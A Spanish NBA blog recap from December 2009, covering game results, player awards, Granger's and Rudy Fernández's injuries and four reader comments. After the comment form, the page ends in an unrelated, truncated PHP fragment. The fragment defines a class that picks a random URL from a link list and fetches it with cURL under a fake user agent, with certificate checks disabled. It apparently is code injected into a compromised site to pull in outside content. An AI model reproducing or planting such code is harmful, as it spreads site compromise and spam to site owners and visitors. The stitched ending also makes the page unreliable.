La Crónica (08/12/09)

09 de December de 2009 por txusma

A estas alturas de temporada hablar de resultados no tiene tanto sentido como de las sensaciones que de ellos se desprenden. Mientras Celtics y Magic, sin sudar demasiado, daban buena cuenta respectivamente de Bucks y Clippers, a los Cavs les dio por complicarse la vida en el FedEx de Memphis. Siendo ellos el vivo ejemplo de que una gran regular no garantiza nada todo debe relativizarse pero es que anoche quedaron retratados una serie de problemas que a bien seguro deberían resolver. Quizás no debería ser tan alarmante que Zach y Mayo te hagan tal traje a medida, pero hoy por hoy parece improbable que un equipo con Delonte y Parker por un lado y Varejao y Hickson por otro pueda tener opciones reales de cazar anillo. Y eso que anoche tocaba la lotería con dos buenos partidos simultáneamente de Mo y Gibson (que no es lo frecuente). La jugada decisiva del “balones” a LeBron está más estudiada que un tebeo. La tuvieron para ganar en el tiempo reglamentario. Fue un completo desastre.

Las sensaciones entre los gallos del Oeste también es agridulce. Tremendo potencial pero escasa consistencia contrastada con la “inmácula” de los Lakers de Gasol. Tiene un pase para los Suns perder de dos en Dallas en un duelo maravilloso de pistoleros (y nunca mejor dicho) Dirk vs Nash, con Josh Howard de vuelta. No lo tiene tanto para los de Arizona el haber palmado 4 de los 5 últimos para considerarlos alternativa de poder.

Por su parte, los Nuggets son hoy por hoy el segundo equipo del WWW, el mejor ofensivamente… pero anoche se estrellaron contra la defensa Brown en Charlotte. Si los Bobcats ya eran duros antes de la llegada de Stephen Jackson, ahora son un dolor de muelas para cualquiera. Lo de Gerald Wallace esta campaña es ciencia ficción. ¡Ay, si Chandler cogiera un mínimo de forma!. Serían temibles.

Inmersos en otros frentes no hubo partidos de relleno anoche. Los Nets profanaron el United Center en, seguramente, su mejor partido colectivo de este curso, haciendo inútiles las soberbias actuaciones de Rose y Deng. En Nueva Orleans, Nocioni falló dos tiros libres para empatar tras un tremendo susto y partidazo de Tyreke Evans. Los Hornets con ya prácticamente todos sus efectivos sanos sufrieron de lo lindo. Por fin pudimos volver a ver un David West implicado y efectivo. Por eso se salvaron. Por último, los Raptors sin Calderon ganaron a los Wolves con bastantes dificultades.

PREMIOS

MVP: Ojito que a estas alturas de la temporada el lider reboteador de la liga es Gerald Wallace con más de 12 rebotes por partido. Con partidos como el de ayer (25 puntos y 16 rebotes) no es de extrañar. Mención también para el casi triple doble de Rajon Rondo (11-9-13 y 5 robos) y el partidazo de Zach Randolph (32-14) en la sorprendente victoria de los Grizzlies.

Rookie: Fantástico Tyreke Evans, como siempre (25-5-9) y fantástico Taj Gibson (20-6). No sé yo si Tyrus Thomas va a recuperar el terreno perdido muy fácilmente.

Sorpresa: Se nos había olvidado que Darius Songaila seguía jugando al baloncesto. Ayer le dio por hacer un buen partido con 11 puntos y un 5 de 5.

Decepción: Partidazo de Matt Barnes. 0 puntos con 0-6 en tiro y 4 pérdidas. Mejor haberse quedado en casa.

Esfuerzo en vano: Derrota de Cleveland, premio para Lebron y es que el de los Cavs se fue a los 43 puntos, 13 rebotes y 6 asistencias. Tampoco lo hizo nada mal Derrick Rose con 27 puntos, 7 rebotes y 10 asistencias. Desgraciadamente para los 2 el resultado fue el mismo.

RAZONES PARA TRASNOCHAR

¿Acaso Stern sabía, allá por los primeros días de agosto cuando se hace público el calendario de la temporada, que Iverson acabaría en las filas de los Sixers? Si no ¿cómo se explica que los dos primeros partidos de Philly tras el regreso del hijo pródigo sean contra sus ex equipos (no contamos a los Grizzlies por motivos obvios)? Tras la derrota ante los Nuggets en su debut, los Sixers reciben esta noche (1h00) a los Pistons. Pese al morbo, no se presenta como el plato más apetecible del menú, título honorífico que se disputarían el Cavs @ Rockets (2h30) y el Jazz @ Lakers (4h30).

LA NOTICIA DEL DÍA

Lesiones de Danny Granger y Rudy Fernández que les tendrán apartados de las canchas prácticamente el mismo tiempo: de 4 a 6 semanas. En los Pacers les debe recorrer un sudor frío después de perder a su mejor jugador y en los Blazers, tras esta nueva lesión que se une a las de Oden, Batum, Outlaw, Mills y Pendergraph, deben pensar que alguien les ha echado un mal de ojo.

VÍDEO

Podemos ver a Dwight Howard abusando de Chris Kaman, a Devin Harris asistiendo a lo Magic Johnson o a Devin Brown taponando la bandeja/mate de Spencer Hawes…

Comenta

4 comentarios a esta entrada

  1. Q dice:
    #1

    Pregunta de un ignorante en el tema:

    Porque Griffin pierde 20 partidos con una rotura de rotula y en cambio Oden es un out of season con la misma lesion?

      Citar

  2. MagicJohnson32 dice:
    #2

    Desde el más absoluto desconocimiento médico, y sólo por lo que he leído, la fractura es diferente. Oden se ha fracturado la rótula completamente (entiendo que se la ha partido en dos) mientras que la rotura de Griffin fue menor (lo llamaron “stress fracture”). De hecho, recuerdo que Griffin y Dunleavy explicaron que podría haber jugado con la lesión, sólo que de esa manera no habría curado y preferían operar. Además también tenía tendinitis, con lo que parecía la opción más razonable.

      Citar

  3. Viva_Dirk dice:
    #3

    Los Grizzlies sin la figura desestabilizadora que estaba siendo Iverson pueden ser un equipo que de sustos. Talento y físico desde luego tienen, veremos si defienden algo.

      Citar

  4. Tobal dice:
    #4

    Victoria importante de los Grizzlies,que demostraron una vez más que son un equipo a tener en cuenta,tienen a cuatro jugadores titulares que anotan con facilidad,y ahora mismo si están inspirados pueden ganar a cualquier equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>